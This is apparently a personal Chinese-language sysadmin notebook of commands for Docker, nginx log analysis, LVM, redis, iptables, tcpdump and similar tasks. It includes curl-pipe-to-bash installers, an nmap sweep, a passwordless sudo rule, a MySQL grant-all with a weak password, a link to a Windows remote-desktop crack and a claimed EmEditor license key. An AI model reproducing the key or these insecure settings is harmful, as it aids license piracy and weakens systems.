docker run -v $OVPN_DATA:/etc/openvpn --rm -it kylemanna/openvpn easyrsa gen-crl update-db
#重启openvpn容器
docker restart openvpn
#docker安装openvpn --end
#docker swarm下 links不工作问题
networks:
default:
aliases:
- xxaxx
- service-xxx-manage-api-server-sys
#traefik 反代相关的几种地址类型
# http://traefik-nginxa/xtxt ==> http://nginxa/
labels:
- "traefik.http.services.nginxa.loadbalancer.server.port=9090"
- "traefik.http.routers.nginxa.middlewares=nginxa-stripprefix"
- "traefik.http.middlewares.nginxa-stripprefix.stripprefix.prefixes=/xtxt"
- "traefik.http.routers.nginxa.rule=Host(`nginxa-papa.yy.local`) && PathPrefix(`/xtxt`)"
# http://traefik-nginxa/xtxt ==> http://nginxa/xtxt
labels:
- "traefik.http.services.nginxa.loadbalancer.server.port=9090"
- "traefik.http.routers.nginxa.rule=Host(`nginxa-papa.yy.local`) && PathPrefix(`/xtxt`)"
# http://traefik-nginxa/xtxt ==> http://nginxa/db 待做
labels:
- "traefik.http.services.nginxa.loadbalancer.server.port=9090"
- "traefik.http.routers.nginxa.middlewares=nginxa-stripprefix,nginxa-addprefix"
- "traefik.http.middlewares.nginxa-stripprefix.stripprefix.prefixes=/xtxt"
- "traefik.http.routers.nginxa.rule=Host(`nginxa-papa.yy.local`) && PathPrefix(`/xtxt`)"
- "traefik.http.middlewares.nginxa-addprefix.addprefix.prefix=/db"
#代替htop的工具
glances
#github.com加速相关的域名
github.global-ssl.fastly.net
github.com
#curl下测试网速相关
curl -o /dev/null -w "\n DNS 解析域名的时间\n namelookup:"%{time_namelookup}"\n client和server端建立TCP 连接的时间\n time_connect:"%{time_connect}"\n 从client发出请求;到web的server 响应第一个字节的时间\n time_starttransfer:"%{time_starttransfer}"\n client发出请求;到web的server发送会所有的相应数据的时间\n time_total:"%{time_total}"\n 下载速度 单位 byte/s\n speed_download(byte/s):"%{speed_download}"\n" 'http://hwa.xxx.com/xxx.apk'
#harbor修改配置文件后重启
docker-compose down
cd /opt/harbor
./prepare #这步别忘记
docker-compose up -d
#supervisor
root@b9fd3d2e29cc:/# ln -s /tmp/supervisor.sock /var/run/
root@b9fd3d2e29cc:/# supervisorctl status
crond RUNNING pid 24, uptime 0:39:22
nginx RUNNING pid 23, uptime 0:39:22
php5-fpm FATAL Exited too quickly (process log may have details)
root@b9fd3d2e29cc:/# supervisorctl restart php5-fpm
#tcp相关
tcp半连接队列大小 max(64, /proc/sys/net/ipv4/tcp_max_syn_backlog)
tcp全连接队列大小 min(backlog, /proc/sys/net/core/somaxconn)
tcp队列溢出查看 netstat -s | egrep "listen|LISTEN"
tcp全连接队列溢出查看 netstat -s | grep "listen"
tcp参数目录 /proc/sys/net/ipv4/tcp_* 各参数的意思?
cat /var/log/messages 有 SYN flooding
#mac brew升级python后路径修复
ln -s /usr/local/Cellar/python@3.9/3.9.1_5/bin/python3 /usr/local/bin/python3
ln -s /usr/local/Cellar/python@3.9/3.9.1_5/bin/pip3 /usr/local/bin/pip3
mac os 终端使用代理
#前提设置好SS
export https_proxy=127.0.0.1:1087
export http_proxy=http://127.0.0.1:1087
export all_proxy=socks5://127.0.0.1:1080
#git
git config --global http.proxy 'socks5://127.0.0.1:1080'
git config --global https.proxy 'socks5://127.0.0.1:1080'
git config --global socks.proxy 'socks5://127.0.0.1:1080'
#git覆盖
#! /bin/bash
git fetch --all
git reset --hard origin/master
git pull
#mac 重装CommandLineTools
sudo rm -rf /Library/Developer/CommandLineTools
sudo xcode-select --install
#当忘记输入nohup时挂起当前运行的程序
1.Ctrl+z #挂起程序,注:此时程序为挂起状态,暂停状态 程序未运行
2.jobs -l #查看后台运行或者挂起状态运行程序的信息, 注意目标程序的ID号
3. bg id号 #把暂停状态的ctrl+z的程序放到后台运行 实现nohup的效果
4. fg id号 #把后台运行或者暂停状态的程序恢复到前台运行
#补充nginx日志中基于IP维度的统计ip个数与ip流量
cat count_ip.sh
last_min=$(date -d last-min +%d/%b/%Y:%H:%M);cd /www/wwwlogs/; for ff in `ls *_access.log`; do cat $ff | grep $last_min | awk -F '" "' -v fname=$ff -v llast_min=$last_min '{split($3,ip_tmp,"\"");requests[ip_tmp[1]]++;} END{for(s in requests){printf("%s %s %s %s\n", requests[s],s,fname,llast_min)}}'| sort -nr | head -n 10; done | sort -nr | head -n 20 | sed "1i test_time:\\$last_min" | head -n 25 >> /data/log/count_ip.log
cat ip_tra.sh
last_min=$(date -d last-min +%d/%b/%Y:%H:%M);cd /www/wwwlogs/; for ff in `ls *_access.log`; do cat $ff | grep $last_min | awk -F '"' -v fname=$ff -v llast_min=$last_min '{split($3,ip_tmp," ");requests[$8]+=ip_tmp[2];} END{for(s in requests){printf("%s %s %s %s\n",requests[s],s,fname,llast_min)}}'| sort -nr | head -n 10; done | sort -nr | head -n 20 | sed "1i test_time:\\$last_min" >> /data/log/ip_tra.log
#nginx日志记录添加到cron
root@nginx1:/data/shell# cat count_site.sh
last_min=$(date -d last-min +%d/%b/%Y:%H:%M);cd /var/log/nginx/; for ff in `ls *_access.log`; do cat $ff | grep $last_min | awk -v fname=$ff -v llast_min=$last_min '{sec=substr($4,2,17);requests[sec]++;} END{for(s in requests){printf("%s %s %s\n", requests[s],s,fname)}}'| sort -nr | head -n 10; done | sort -nr | head -n 20 | sed "1i test_time:\\$last_min" >> /data/log/count_site.log
root@nginx1:/data/shell# cat count_url.sh
last_min=$(date -d last-min +%d/%b/%Y:%H:%M);cd /var/log/nginx/; for ff in `ls *_access.log`; do cat $ff | grep $last_min | awk -v fname=$ff -v llast_min=$last_min '{split($7,uri_tmp,"?");requests[uri_tmp[1]]++;} END{for(s in requests){printf("%s %s %s %s\n", requests[s],s,fname,llast_min)}}'| sort -nr | head -n 10; done | sort -nr | head -n 20 | sed "1i test_time:\\$last_min" | head -n 25 >> /data/log/count_url.log
root@nginx1:/data/shell# cat site_tra.sh
last_min=$(date -d last-min +%d/%b/%Y:%H:%M); cd /var/log/nginx/;for ff in `ls *_access.log`; do cat $ff | grep $last_min | awk -v fname=$ff '{sec=substr($4,2,17);requests[sec]+=$10;} END{for(s in requests){printf("%s %s %s\n", requests[s],s,fname)}}' | sort -nr | head -n 10; done | sort -nr | sed "1i test_time:\\$last_min" >> /data/log/site_tra.log
root@nginx1:/data/shell# cat url_tra.sh
last_min=$(date -d last-min +%d/%b/%Y:%H:%M);cd /var/log/nginx/; for ff in `ls *_access.log`; do cat $ff | grep $last_min | awk -v fname=$ff -v llast_min=$last_min '{split($7,uri_tmp,"?");requests[uri_tmp[1]]+=$10;} END{for(s in requests){printf("%s %s %s %s\n",requests[s],s,fname,llast_min)}}'| sort -nr | head -n 10; done | sort -nr | head -n 20 | sed "1i test_time:\\$last_min" >> /data/log/url_tra.log
root@nginx1:/etc/cron.d# cat count_site
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/2 * * * * root /data/shell/count_site.sh
root@nginx1:/etc/cron.d# cat count_url
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/2 * * * * root /data/shell/count_url.sh
root@nginx1:/etc/cron.d# cat site_tra
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/2 * * * * root /data/shell/site_tra.sh
root@nginx1:/etc/cron.d# cat url_tra
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/2 * * * * root /data/shell/url_tra.sh
#nginx日志5
#统计某日志文件夹下的前一分钟的流量排行,行首通过sed添加运行时间
#sed 1 代表第一行 $ 代表最后一行 i 代表在定位的上一行插入 a 代表在定位的最后一行插入
last_min=$(date -d last-min +%d/%b/%Y:%H:%M); for ff in `ls *_access.log`; do cat $ff | grep $last_min | awk -v fname=$ff '{sec=substr($4,2,17);requests[sec]+=$10;} END{for(s in requests){printf("%s %s %s\n", requests[s],s,fname)}}' | sort -nr | head -n 10; done | sort -nr | sed "1i test_time:\\$last_min"
#nginx日志4
#nginx日志统计每分钟的请求流量是多少并排除多余选项,并把文件名带入到awk变量中
last_min=$(date -d last-min +%d/%b/%Y:%H:%M); for ff in `ls *_access.log`; do cat $ff | grep $last_min | awk -v fname=$ff '{sec=substr($4,2,17);requests[sec]+=$10;} END{for(s in requests){printf("%s %s %s\n", requests[s],s,fname)}}' | sort -nr | head -n 10; done
#nginx日志3
#最近一分钟的某文件夹下的统计情况
last_min=$(date -d last-min +%d/%b/%Y:%H:%M); echo $last_min; for ff in `ls *_access.log`; do echo $ff;cat $ff | grep $last_min | awk '{sec=substr($4,2,20);requests[sec]++;} END{for(s in requests){printf("%s %s\n", requests[s],s)}}' | sort -nr | head -n 10; done
#nginx日志1
#日期格式化为 nginx日志中的日期 上一分钟
date -d last-min +%d/%b/%Y:%H:%M:%S
# 适应整个文件夹
for ff in `ls *_access.log`; do echo $ff;cat $ff | awk '{sec=substr($4,2,20);requests[sec]++;} END{for(s in requests){printf("%s %s\n", requests[s],s)}}' | sort -nr | head -n 10; done
#nginx日志分析
#统计每秒访问了多少次 可考虑作为CC的一个指标
cat main.log | awk '{sec=substr($4,2,20);requests[sec]++;} END{for(s in requests){printf("%s %s\n", requests[s],s)}}' | sort -nr | head -n 10
#统计每分钟访问了多少次 可考虑作为CC的一个指标
cat main.log | awk '{sec=substr($4,2,20);requests[sec]++;} END{for(s in requests){printf("%s %s\n", requests[s],s)}}' | sort -nr | head -n 10
#统计每秒钟占用的带宽 $10 为 byte_sent变量的值
cat html_ax_com_access.log | awk '{sec=substr($4,2,20);requests[sec]+=$10;} END{for(s in requests){printf("%s %s\n", requests[s],s)}}' | sort -nr | head -n 10
#统计每分钟占用的带宽 $10 为 byte_sent变量的值
cat html_ax_com_access.log | awk '{sec=substr($4,2,17);requests[sec]+=$10;} END{for(s in requests){printf("%s %s\n", requests[s],s)}}' | sort -nr | head -n 10
#在指定的某个时间,占用带宽最大的url $7为访问的url $10为发送的流量
cat main.log |grep '12/Oct/2020:18:07' | awk '{requests[$7]+=$10;} END{for(s in requests){printf("%s %s\n", requests[s],s)}}' | sort -nr | head -n 10
#在指定的某个时间,占用带宽最大的url $7为访问的url $10为发送的流量 其中把url中按?分隔当着key,只取uri,不取对应的参数
cat main.log | grep '22/Oct/2020:07:47:12' | awk '{split($7,uri_tmp,"?");requests[uri_tmp[1]]+=$10;} END{for(s in requests){printf("%s %s\n",requests[s],s)}}' | sort -nr | head -n 10
#安装toa
注意(重要): toa只支持ipv4的端口
注意内核参数是否需要调整
/proc/sys/net/ipv4/tcp_max_syn_backlog
/proc/sys/net/core/somaxconn
#debian9
apt-get update && apt-get full-upgrade # full-upgrade 升级到最新内核 不然后面linux-header版本缺失
init 6
apt-get install linux-headers-`uname -r`
apt-get install gcc make git
cd /opt && git clone https://github.com/Huawei/TCP_option_address.git
cd TCP_option_address/src/
make && make install
mkdir /opt/toa/ && cp toa.ko -r /opt/toa/toa.ko
chmod +x /etc/rc.local
#rc.local
insmod /opt/toa/toa.ko
#清华大学镜像加速站
https://mirrors.tuna.tsinghua.edu.cn/help/mysql/
#linux监控工具
apt-get install iotop htop iptraf
#debian10 镜像地址:
root@debian10:/opt# cat /etc/apt/sources.list
deb http://mirrors.huaweicloud.com/debian buster main non-free contrib
deb-src http://mirrors.huaweicloud.com/debian buster main non-free contrib
deb http://mirrors.huaweicloud.com/debian buster-updates main non-free contrib
deb-src http://mirrors.huaweicloud.com/debian buster-updates main non-free contrib
deb http://mirrors.huaweicloud.com/debian buster-proposed-updates main non-free contrib
deb-src http://mirrors.huaweicloud.com/debian buster-proposed-updates main non-free contrib
deb http://mirrors.huaweicloud.com/debian buster-backports main non-free contrib
deb-src http://mirrors.huaweicloud.com/debian buster-backports main non-free contrib
deb http://mirrors.huaweicloud.com/debian-security buster/updates main non-free contrib
deb-src http://mirrors.huaweicloud.com/debian-security buster/updates main non-free contrib
#dig nslookup
apt-get install dnsutils
yum install bind-utils
#debian 安装 nodejs 12
apt-get update
apt-get install curl dirmngr apt-transport-https lsb-release ca-certificates
curl -sL https://deb.nodesource.com/setup_12.x | bash -
apt-get install nodejs
apt-get install gcc g++ make
npm install -g yarn
#nginx if location rewrite
#nginx if location rewrite
server {
listen 80;
server_name xxx.com;
root /opt/xxx_com/;
set $flag "a";
if ( $request_uri ~* /.well-known/pki-validation/fileauth.txt ) {
set $flag "b";
}
if ($flag = "a") {
rewrite ^/(.*) http://www.xxx.com/$1 permanent;
}
}
#redis批量删除Key
redis-cli -c -p 6379 -h xxx.xxx.xxx.xxx keys 'xxx*' | xargs redis-cli del
#debian9 apt-get 安装python3.7
vim /etc/apt/sources.list
deb http://mirrors.163.com/debian/ testing main
apt-get update
apt-get install python3
# 主要是使用testing源
#redis-cli批量执行命令:
cat cmd.txt | redis-cli -c -p 7000 -h 10.100.12.65
cat cmd.txt
SADD set:ma:version "VSTM000GV387"
SADD set:ma:version "M500AB0303.0106"
SADD set:ma:version "VSTM000GV323"
#curl 请求非可见字符
#base64方式
echo "eyJhIjoiXHgaGiJ9" | base64 -d | xargs -I F curl --proxy 127.0.0.1:8080 -H "Content-Type:application/json" -H "Data_Type:msg" -X POST --data 'F' http://10.100.9.24:8090/
#16进制方式
echo '7b613a5c781a1a7d' | xxd -r -p | xargs -I F curl --proxy 127.0.0.1:8080 -H "Content-Type:application/json" -H "Data_Type:msg" -X POST --data 'F' http://10.100.9.24:8090/
#--data-binary 方式
curl -i -s -k -X $'POST' \
-H $'Host: 10.100.9.24:8090' -H $'User-Agent: curl/7.64.1' -H $'Accept: */*' -H $'Content-Type:application/json' -H $'Data_Type:msg' -H $'Content-Length: 8' -H $'Connection: close' \
--data-binary $'{a:\\x\x1a\x1a}' \
$'http://10.100.9.24:8090/'
macos下的xargs
#xargs -i -r 不一样
#mac
echo "c3RyCg==" | base64 -d | xargs -I F echo aFb
#linux
echo "c3RyCg==" | base64 -d | xargs -i echo a{}b
#arp信息统计
#arp1.txt
nohup tcpdump -nvv arp > /tmp/arp1.txt
cat arp1.txt | awk '{print $11}' | sort | uniq -c | sort -nr | head -n 20
cat arp1.txt | awk '{print $13}' | sort | uniq -c | sort -nr | head -n 20
#交换机添加三层安全策略
acl number 3000
rule 0 deny tcp source 10.100.1.3 0 destination 123.57.55.183 0
rule 5 deny tcp source 10.100.1.3 0 destination 10.100.9.25 0
#
traffic classifier tc1 operator and
if-match acl 3000
#
traffic behavior tb1
deny
#
traffic policy tp1
classifier tc1 behavior tb1
interface GigabitEthernet0/0/3
traffic-policy tp1 inbound
#hbase 根据时间区间来查询
echo "scan 'XbLog' , {TIMERANGE => [1575531294524, 1575535019000] }" | hbase shell
#hbase根据rowkey来查询
scan 'hour_first_source', {FILTER => "RowFilter(=, 'regexstring:004_9223370461325575807')"}
#xenserver 重启api
xe-toolstack-restart
xsconsole
#xenserver 将当前服务器设置为主服务器 可用于pool中的slave单独运行
xe pool-emergency-transition-to-master
#tree 列目录,只列出文件,按行来显示
tree -ifF /tmp | grep -v '/$'
#显示文件大小
tree -ifFsD /tmp/ | grep -v '/$'
alias 根据端口号来统计ip连接情况 hostporta 80 这样的方式使用
#根据端口号来统计ip连接情况 hostporta 80 这样的方式使用
alias hostporta="_a(){ netstat -an | grep -v unix | grep :\$1\\\s | awk '{print \$5}' | awk -F ':' '{print \$1}' | sort |uniq -c ; }; _a"
#生成ip段并保存为文件
echo 192.168.{1..255}.{1..255} | tr ' ' '\012' > /tmp/xx.txt
#Windows 2008 R2 安装激活终端服务破解远程最大连接数2
https://wenku.baidu.com/view/98b3b92003d8ce2f00662359.html
#sgdisk方式快速创建lvm
sgdisk -n 1:0:0 /dev/vdb -t 1:8e00
pvcreate /dev/vdb1
vgextend debian-vg /dev/vdb1
lvextend -l +100%free /dev/debian-vg/root
xfs_growfs /dev/debian-vg/root
df -h
#快速创建lvm
parted -a optimal -s /dev/vdb mklabel msdos mkpart primary 0% 100% toggle 1 lvm
parted /dev/vdb toggle 1 lvm # set /dev/vdb1 to linux lvm
parted /dev/vdb rm 1 #del /dev/vdb1
parted -a optimal -s /dev/vdb mklabel msdos mkpart primary 0% 100% toggle 1 lvm
pvcreate /dev/vdb1
vgextend debian-vg /dev/vdb1
lvextend -l +100%free /dev/debian-vg/root
xfs_growfs /dev/debian-vg/root
df -h
#debian rc.local
root@ecs-cdc2-0019:~# cat /lib/systemd/system/rc.local.service
# This file is part of systemd.
#
# systemd is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 2.1 of the License, or
# (at your option) any later version.
# This unit gets pulled automatically into multi-user.target by
# systemd-rc-local-generator if /etc/rc.local is executable.
[Unit]
Description=/etc/rc.local Compatibility
ConditionFileIsExecutable=/etc/rc.local
After=network.target
[Service]
Type=forking
ExecStart=/etc/rc.local start
TimeoutSec=0
RemainAfterExit=yes
GuessMainPID=no
[Install]
WantedBy=multi-user.target
#其中新增的为
#[Install]
#WantedBy=multi-user.target
root@ecs-cdc2-0019:~# cat /etc/rc.local
#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.
echo 11 >> /opt/t.txt
exit 0
#注意 rc.local第一行一定不能为空,
chmod +x /etc/rc.local
#开启rc.local服务
systemctl enable rc-local
# 检验服务有没有加成功 ls /etc/systemd/system/multi-user.target.wants/
#启动服务
systemctl start rc-local
#查看后台运行程序的输出 stdout ( nohup、setsid、(&)和disown 这几种方式的后台运行都可以)
strace -p<pid> -s9999 -e write
strace -p<pid> -s9999 -e write=3
#parted 分区
parted /dev/xvde mklabel gpt
parted /dev/xvdf mklabel gpt
parted /dev/xvde mkpart primary 1 100%
parted /dev/xvdf mkpart primary 10G
parted /dev/xvdf mkpart primary 10G 20G
parted /dev/xvdf mkpart primary 20G 30G
parted /dev/xvdf mkpart primary 30G 100%
#rm -rf排除文件
rm -rf !(ca.2019-07-10|cb.2019-07-10)
rm -rf !(*2019-07-10)
#仅保留括号中符合条件的文件,其余全部删除,一般用在清除日志文件件用,保留部份文件,
rm -rf !(path_to_file/test_0{3,5}.jpg)
#iterm2-zmodem rz sz
https://github.com/luxihk/iterm2-zmodem
#jdk url
https://packages.baidu.com/app/jdk-8/
mac shell 查看本机监听开放端口
lsof -P -i TCP -s TCP:LISTEN
#相当于linux的 netstat -tlnp
#tail grep save 实时保存文件
tail -f /mydir/myfile | grep --line-buffered "searchterm" >> outfile #注意grep的 --line-buffered 参数
#查看网络流量连接信息 jnettop
#emeditor永久授权正版激活密钥:DMAZM-WHY52-AX222-ZQJXN-79JXH
#cat方式保存文件
cat > /tmp/test.sh <<EOF
#!/bin/bash
ls
whoami
pwd
EOF
#更新文件夹相同的目录结构内容,比如常见的升级 patch update
rsync --progress --inplace -r update/* one #强制替换
rsync --progress --update -r update/* one #update文件夹中的文件时间必须比目标文件的文件时间新才会完成替换
yes|cp -ruv update/* one # 也必须要满足文件时间条件才会覆盖
#keytool导入证书
keytool -import -keystore "/home/tomcat/jdk1.7.0_60/jre/lib/security/cacerts" -storepass changeit -keypass changeit -alias oss -file osscas.cer
#批量添加IP到IPTABLES中
cat 6.txt | grep "photo" | awk '{print $1}' | sort | uniq -c | sort -nr |head -n 10 | awk '{print $2}' | xargs -i iptables -I INPUT -s {} -j DROP
#python脚本批量删除redis scan pipeline
import redis
import random
import string
import time
from rediscluster import StrictRedisCluster #pip install redis-py-cluster
nodes = [{"host": "172.16.18.107", "port": "7003"}]
r = StrictRedisCluster(startup_nodes=nodes, decode_responses=True)
def del_keys_with_pipe():
start_time = time.time()
result_length = 0
pipe = r.pipeline()
for key in r.scan_iter(match='dba_*', count=5000):
pipe.delete(key)
result_length += 1
if result_length % 5000 == 0:
pipe.execute()
pip_time = time.time()
print "use pipeline scan time ", time.time() - start_time
pipe.execute()
print "use pipeline end at:", time.time() - pip_time
print "use pipeline ways delete numbers:", result_length
def main():
del_keys_with_pipe()
if __name__ == '__main__':
main()
#redis scan 批量删除
for i in {1..1000}
do
t=$(($i*5000))
echo $t
cmdstr="/home/redis/redis-3.2.9/src/redis-cli -c -h 172.31.10.157 -p 7000 scan ${t} match streamChain:all:integrity:M* count 10000 | grep stream | xargs -i /home/redis/redis-3.2.9/src/redis-cli -c -h 172.31.10.157 -p 7000 del {}"
eval $cmdstr
done
#文件每行按长度排序 bash sort longest line
cat monitor.txt | awk '{print length, $0}' | sort -n -r | head -n 10
#gdb插件
gef (https://github.com/hugsy/gef)
gdbinit(https://github.com/gdbinit/Gdbinit)
peda(https://github.com/longld/peda)
#代替scp的快速传输软件
tsunami-udp
#crontab每隔几小时的正确写法
* */1 * * * #错误的每隔一小时执行一次,事实上每分钟执行一次
0 */3 * * * #错误的每隔3小时执行一次写法 只是到3小时后的0分执行
*/60 * * * * #每60分钟即每小时执行一次
*/120 * * * * #每120分钟即每两小时执行一次
*/120 * * * * root /opt/clean.sh #注意必要的地方要带上用户
#定时删除过期日志
cat /opt/clean.sh
#!/bin/bash
find /home/tomcat/tomcat-7.0.54/logs/ -mtime +0.4 -name "*2018-*" -exec rm {} \;
cat /etc/cron.d/clean
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/120 * * * * root /opt/clean.sh
#另find mtime解释
find . -mtime N
实际上你应该这样理解..
N * 24
+1 内表示 1 * 24 +24小时以外..
+0 才表示 0 * 24 +24小时以外
1 表示 1*24 + 24 到 24 之间..
0 表示 0*24 + 24 到 0 之间..
-1 表示 0*24 +24 内,甚至为未来时间...
#rc.local 不生效
#确保 rc-local sysv-rc 服务存在
#确保rc.local 第一行存在 #!/bin/bash
apt-get install initscripts
chmod +x /etc/rc.local
#Kubernetes创建pod一直处于ContainerCreating open /etc/docker/certs.d/registry.access.redhat.com/redhat-ca.crt: no such file or directory
yum install python-rhsm-certificates #检查/etc/rhsm/ca/redhat-uep.pem 文件是否存在, 如果存在不进行如下步骤
wget http://mirror.centos.org/centos/7/os/x86_64/Packages/python-rhsm-certificates-1.19.10-1.el7_4.x86_64.rpm
rpm2cpio python-rhsm-certificates-1.19.10-1.el7_4.x86_64.rpm | cpio -div
cp redhat-uep.pem /etc/rhsm/ca
ln -s /etc/rhsm/ca/redhat-uep.pem /etc/docker/certs.d/registry.access.redhat.com/redhat-ca.crt
#root sudo
vi /etc/sudoers
zabbix ALL=(ALL:ALL) NOPASSWD:ALL
root ALL=(ALL) ALL
#sed多行删除与替换
#sed 多行删除
sed -i '/java\.lang\.ClassCastException0.*/{:n;N;/Thread\.java:745/!bn};d' t.txt
#sed 多行替换
sed '/<Directory .*>/{:n;N;/<\/Directory>/!bn};s/\n.*\n/\n Options None\n AllowOverride None\n Order deny,allow\n Deny from all\n/' urfile
#python查看包路径
import redis
print redis.__file__
#apt-get 安装的zookeeper 设置JVM内存大小
/usr/share/zookeeper/bin/zkEnv.sh
export JVMFLAGS="-Xmx2048m -Xms2048m"
#linux倒序显示
root@debian:/opt# tac /tmp/passwd
root@debian:/opt# sed '1!G;h;$!d' /tmp/passwd
root@debian:/opt# awk '{a[NR]=$0}END{for(i=NR;i>0;i--)print a[i]}' /tmp/passwd
#zk zookeeper 前台启动,用户显示错误信息,方便排查错误
zkServer.sh start-foreground
apt-get install curl software-properties-common
curl -sL https://deb.nodesource.com/setup_10.x | bash -
apt-get update
apt-get install nodejs
#linux tcpping
apt-get install tcptraceroute bc
wget http://www.vdberg.org/~richard/tcpping
tcpping x.x.x.x xxx
yum install tcptraceroute bc
#tcpping
tcping x.x.x.x xxx
psping x.x.x.x xxx
#linux
tcpping
tcproute
#linux
tcptraceroute
#重置centos7.x root密码
#问题:centos7怎么进入单用户模式
#答案:在grub2菜单,按e编辑;找到linux16开头的那一行,在最后加上init=/bin/bash;
#这样做是只读模式,如果要改成读写模式还需要把linux16开头那一行中间的ro改成rw;
#如果你用的是kvm做了console连接授权,还要把授权的console=ttyS0去掉,再加上init=/bin/bash;
#最后按ctrl+x
init=/bin/bash
mount -o remount,rw /
passwd root
exec /sbin/init 或
exec /sbin/reboot
#增加swap空间
dd if=/dev/zero of=/var/swapfile1 bs=1024 count=209715200
mkswap /var/swapfile1
swapon /var/swapfile1
/etc/fstab文件, 在文件的末尾加上/var/swapfilel swap swap defaults 0 0
#md5文件hash
for i in {"/etc","/bin","/sbin","/usr/bin","/usr/sbin"};do md5deep -r $i >>/usr/local/file_hashs.txt;done
#ipvsadm
#查看具体连接
ipvsadm -lcn
#zk 导出
git clone https://github.com/ctapmex/zkTreeUtil.git #zookeeper zk 导出工具
./zktreeutil.sh -z 172.16.132.176:2181 -of ./a.txt -e
./zktreeutil.sh -z 172.16.132.176:2181 -ox ./b.txt -e
#ps 查看命令的全部内容
ps aux----->ps auxww # add ww
ps aux --width=10000
#add swap
#add swap
dd if=/dev/zero of=/swapfile bs=1M count=4096 && mkswap /swapfile && swapon /swapfile
vim /etc/fstab
/swapfile swap swap defaults 0 0
vim /etc/sysctl.conf
vm.swappiness = 0
#tcpdump抓包并保存
nohup tcpdump port 9980 -s0 -G 86400 -Z root -w /opt/bd_%Y_%m%d_%H%M_%S.pcap &
#如果wireshark 打开报错 可尝试 修复
pcapfix bd.pcap
#mysql添加账号
GRANT ALL PRIVILEGES ON *.* TO 'testa'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
FLUSH PRIVILEGES;
GRANT ALL PRIVILEGES ON *.* TO ‘testa’@’localhost’ IDENTIFIED BY ‘123456’ WITH GRANT OPTION;
FLUSH PRIVILEGES;
#fping 查看存活主机
fping -a -g 172.21.10.1 172.21.11.254 2> /dev/null
#fping 查看不存活主机
fping -u -g 172.21.10.1 172.21.11.254 2> /dev/null
#Linux 下编译 Mac 和 Windows 64位可执行程序
CGO_ENABLED=0 GOOS=darwin GOARCH=amd64 go build main.go
CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build main.go
#把大文件按行分隔成小文件
split -l 1000000 pinggood.txt split_ -d
#linux调试
objdump
edb #https://github.com/eteran/edb-debugger
#nmap1
nmap -iL ok_8123.txt -p 8123 -n -T5 -oG - > ./8123_result.txt
#nginx rewrite
location ~* ^/get{
rewrite ^/get?(.*)$ /get.php?$1 last;
}
#http://www.so-cools.com/get?xxx=123==>http://www.so-cools.com/get.php?xxx=123
#查看LV 分区 硬盘情况 并挂载LV分区 (类似的img文件也可以)
lsblk #比mount直观
由于cinder在lvm下,会给每一个云主机创建一个lv, 但是我们想知道里面的内容是什么,
fdisk -l /dev/centos/volume-ac76794d-8045-4147-98b5-31683a7cc476
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 65536 bytes / 65536 bytes
Disk label type: dos
Disk identifier: 0x00000000
Device Boot Start End Blocks Id System
/dev/centos/volume-ac76794d-8045-4147-98b5-31683a7cc476p1 * 16065 2088449 1036192+ 83 Linux
#关键:
Units = sectors of 1 * 512 = 512 bytes 1块的长度是多少
Start = 16065
开始地址就为 16065 * 512 = 8225280
挂载命令就为
mount -o loop,offset=8225280 /dev/centos/volume-ac76794d-8045-4147-98b5-31683a7cc476 /mnt/xx
参考:https://unix.stackexchange.com/questions/82314/how-to-find-the-type-of-img-file-and-mount-it
mount -o loop,ro,offset=$(( 512*1526301 )) /dev/xxxd /mnt/
#也可以使用类似
#debian安装node
apt-get autoremove node
apt-get autoremove npm
curl -sL https://deb.nodesource.com/setup | bash -
apt-get install nodejs
npm cache clean -f
npm install -g n
n stable
#debian apt安装oracel jdk
echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee /etc/apt/sources.list.d/webupd8team-java.list
echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" | tee -a /etc/apt/sources.list.d/webupd8team-java.list
apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys EEA14886
apt-get update
apt-get install oracle-java8-installer oracle-java8-set-default
#http://www.webupd8.org/2014/03/how-to-install-oracle-java-8-in-debian.html
#iptables删除已有规则(行号简单版本)
iptables -L INPUT --line-numbers #列出指定的链的规则的编号来
iptables -D INPUT 3 #例如上面要删除一个INPUT链的规则的话可以这样
#chrome 直接获取网络封包
chrome://net-internals/
#centos 7 安装 pfring-drivers-zc
yum install dmsg kernel-devel
rpm -Uvh http://packages.ntop.org/rpm7/Packages/e1000e-zc-3.2.7.1.1633-dkms.noarch.rpm
rpm -Uvh http://packages.ntop.org/rpm7/Packages/i40e-zc-2.3.6.1633-1dkms.noarch.rpm
rpm -Uvh http://packages.ntop.org/rpm7/Packages/igb-zc-5.3.3.5.1633-dkms.noarch.rpm
rpm -Uvh http://packages.ntop.org/rpm7/Packages/ixgbe-zc-5.0.4.1633-dkms.noarch.rpm
rpm -Uvh http://packages.ntop.org/rpm7/Packages/pfring-dkms-7.1.0-1633.noarch.rpm
rpm -Uvh http://packages.ntop.org/rpm7/Packages/pfring-drivers-zc-dkms-1.2-0.noarch.rpm
然后 lsmod | grep pf
pf_ring 1238340 2
#批量清空某个目录下的所有文件
find . -type f -exec cp /dev/null {} \;
#ubuntu debian 设置网卡启动,但是不给分配ip
auto eth1
iface eth1 inet manual
#制作u盘启动盘 centos windows
Win32 Disk Imager
rufus
#这两个工具比较方便
#rar命令行加密
rar a -hpasdfasdfasdfasdfasdfasdf test.rar xxx.tar #加密头和数据
rar a -pasdfasdfasdfasdfasdfasdf test.rar xxx.tar #只加密数据
#https://www.rarlab.com/download.htm linux rar 下载
#dnsmasq安装
